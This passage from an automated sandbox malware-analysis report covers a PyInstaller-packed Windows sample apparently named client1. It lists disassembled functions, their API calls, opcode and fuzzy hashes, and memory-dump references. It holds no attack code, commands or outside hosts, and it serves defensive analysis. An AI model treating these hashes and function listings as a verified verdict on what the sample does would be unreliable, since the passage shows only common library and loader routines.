                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CloseErrorHandleLast
                                                    • String ID:
                                                    • API String ID: 918212764-0
                                                    • Opcode ID: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                    • Instruction ID: 2210f0c6ec18eeecfef81bc4cfd7c9cdc769538a92b900b740c2422d0832fc66
                                                    • Opcode Fuzzy Hash: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                    • Instruction Fuzzy Hash: 4C21C211B0C7C341FA747770A4942F9969BAF447A8F844235D93E477C2CFAEA4459320
                                                    Function 00007FF79F63B37C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                    • Instruction ID: b5a193a13d7b48370e63cf277ad17c374611f16b92cad1aa5c5fcc9b271d7ff0
                                                    • Opcode Fuzzy Hash: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                    • Instruction Fuzzy Hash: 8841BB3291878147EA34EB35E5401B9F76AEBD5750F900131E6AD476D5CF7CE402CB61
                                                    Function 00007FF79F627200 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock
                                                    • String ID:
                                                    • API String ID: 840049012-0
                                                    • Opcode ID: 033a4210891c7de0e80cf35636e901d9f642a42152a779333d6082372dd68c1a
                                                    • Instruction ID: aaba48ed78273238833eb8c1e2c2563056a8dc6ee45a4c99caa644b75089b6cd
                                                    • Opcode Fuzzy Hash: 033a4210891c7de0e80cf35636e901d9f642a42152a779333d6082372dd68c1a
                                                    • Instruction Fuzzy Hash: 0A218521B193D145EA31BA3269447FAE65ABF45BD4FC84430EE2D87786CF7DE1418211
                                                    Function 00007FF79F63AE0C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                    • Instruction ID: 63730c47883fcca5f8c442cb7ac1d0d8529cbffe6236c03dfad8cc0605df32aa
                                                    • Opcode Fuzzy Hash: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                    • Instruction Fuzzy Hash: F0319222A187C145EB61BB3594013F8A66AEF40BA1F910135DA3D433D3CFFDA4419731
                                                    Function 00007FF79F6354C8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                    • Instruction ID: 15fc347ae576280363d2ac980cfb010aeb15619487631d56c09895f8abcbe662
                                                    • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                    • Instruction Fuzzy Hash: D0118422A1C7C241EE74BF61A4012F9E2AAEF85B80FD54031EA5C57797DFBDD8108721
                                                    Function 00007FF79F64575C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                    • Instruction ID: 44a8cb5cefe810d6dade91abf6b13ea437ccdd4a3b9926db605ca3c2ca9ebe9c
                                                    • Opcode Fuzzy Hash: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                    • Instruction Fuzzy Hash: AA218732A18BC187DB71BF28E4403B9B7A6EB84B94F944235E66D476D9DF3DD8008B14
                                                    Function 00007FF79F62F61C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                    • Instruction ID: 7d7071be6193a31a210b6f2e7c33f2c77c87ea4d077429a36c17e782bd0935d6
                                                    • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                    • Instruction Fuzzy Hash: 6D01A521B187C240EA24BB7699010E9E69EFB45FE0F888631DE7C57BD6CE7CD4019711
                                                    Function 00007FF79F6271B0 Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF79F627A30: MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF79F6230BE), ref: 00007FF79F6271D3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLibraryLoadMultiWide
                                                    • String ID:
                                                    • API String ID: 2592636585-0
                                                    • Opcode ID: 63080640ee8bd5a5197bc5957a639ee791a00d05320db4a40cef4a6e5ab977c0
                                                    • Instruction ID: db1b079971d0752154b27682a3aa2bfcf54e5b5dba51319fc6a3235899017180
                                                    • Opcode Fuzzy Hash: 63080640ee8bd5a5197bc5957a639ee791a00d05320db4a40cef4a6e5ab977c0
                                                    • Instruction Fuzzy Hash: 73E08612B1828542EE28BB77A9464EAE256AF48BC0B989035DE1D47755DD2DD4904A00
                                                    Function 00007FF79F63DD40 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF79F63A8B6,?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E), ref: 00007FF79F63DD95
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                    • Instruction ID: 759ff3523cf500773aa47cd43d58c483f52b5daeafbc5732d7f1b4788e0dabf0
                                                    • Opcode Fuzzy Hash: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                    • Instruction Fuzzy Hash: 7CF04F54B1978A41FEB57A7255403F5A69E5F84B80F985630C92D86282DD9CF5508330
                                                    Function 00007FF79F63CACC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF79F62FE44,?,?,?,00007FF79F631356,?,?,?,?,?,00007FF79F632949), ref: 00007FF79F63CB0A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                    • Instruction ID: aa05f9ea2760911250fe5ba90daae30ba66b8c2fb617f334bac014371a84969b
                                                    • Opcode Fuzzy Hash: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                    • Instruction Fuzzy Hash: 18F05E01B0D3C245FE347AB159402F591EA5F457A0F880630E93E862C2EEACB4408231

                                                    Non-executed Functions

                                                    Function 00007FF79F621B90 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                    • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                    • API String ID: 2446303242-1601438679
                                                    • Opcode ID: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                    • Instruction ID: b9134069d09b4a981dbd7b4c413f77d9912caae64fa4358441e8a9d992f4923f
                                                    • Opcode Fuzzy Hash: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                    • Instruction Fuzzy Hash: 05A17C32208BC196E724AF21E98479EB375F748BA4F904129DB9D43B14DF3DE165CB50
                                                    Function 00007FFBAA7318A0 Relevance: 13.9, APIs: 9, Instructions: 425COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Mem_$SubtypeType_$DataFreeFromKindMallocReallocUnicode_
                                                    • String ID:
                                                    • API String ID: 1742244024-0
                                                    • Opcode ID: 2d17a493920b6b36c6fa0658f81e569c9b995c639d436fc25a26417b6e17d25f
                                                    • Instruction ID: c04d64c3fef85792c4400a0fdf12867e3e17d2fe46a8b686db6be3bf82c6c907
                                                    • Opcode Fuzzy Hash: 2d17a493920b6b36c6fa0658f81e569c9b995c639d436fc25a26417b6e17d25f
                                                    • Instruction Fuzzy Hash: EB0202F2B0E592C2EB769F39D44467B37A9EB44744F1641B5EE8E46690EE2CE442C330
                                                    Function 00007FFBAA733058 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 313767242-0
                                                    • Opcode ID: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                    • Instruction ID: 63a731e721399a7c8df38d15341aaedb02992d6044c6cb3a0ae5b139c9d1dce0
                                                    • Opcode Fuzzy Hash: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                    • Instruction Fuzzy Hash: 41317CB270AA81C9EB61AF70E8903EE7369FB84344F45403ADA4E47A84DF39C149C720
                                                    Function 00007FF79F626780 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTempPathW.KERNEL32(?,00000000,?,00007FF79F62674D), ref: 00007FF79F62681A
                                                      • Part of subcall function 00007FF79F626990: GetEnvironmentVariableW.KERNEL32(00007FF79F6236E7), ref: 00007FF79F6269CA
                                                      • Part of subcall function 00007FF79F626990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79F6269E7
                                                      • Part of subcall function 00007FF79F6366B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6366CD
                                                    • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF79F6268D1
                                                      • Part of subcall function 00007FF79F622770: MessageBoxW.USER32 ref: 00007FF79F622841
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                    • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                    • API String ID: 3752271684-1116378104
                                                    • Opcode ID: b4ad522e37175ac7074a900ecec4c645a4870e05ba81b0992846085732047fb7
                                                    • Instruction ID: b73e192bfc0180aee66994aca1c09f11a953c254c91d60ba9fbfde6821ca2ccd
                                                    • Opcode Fuzzy Hash: b4ad522e37175ac7074a900ecec4c645a4870e05ba81b0992846085732047fb7
                                                    • Instruction Fuzzy Hash: A1517811F197C340FA74BB7299552FAD25B9F4ABC4FC44031E82E87796EE6EE4018721
                                                    Function 00007FF79F62B69C Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                    • Instruction ID: d3ee896b1ff875c06ffffb4a6673900127d9fc7f2f0ab2d6f5dccacd6d17444e
                                                    • Opcode Fuzzy Hash: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                    • Instruction Fuzzy Hash: EF312D72609BC196EB70AF70E8803E9B369FB84754F844439DA5D47B95DF38D548C720
                                                    Function 00007FF79F644E20 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF79F644E65
                                                      • Part of subcall function 00007FF79F6447B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447CC
                                                      • Part of subcall function 00007FF79F639E18: HeapFree.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                      • Part of subcall function 00007FF79F639DD0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF79F639DAF,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F639DD9
                                                      • Part of subcall function 00007FF79F639DD0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF79F639DAF,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F639DFE
                                                    • _get_daylight.LIBCMT ref: 00007FF79F644E54
                                                      • Part of subcall function 00007FF79F644818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F64482C
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450CA
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450DB
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450EC
                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79F64532C), ref: 00007FF79F645113
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
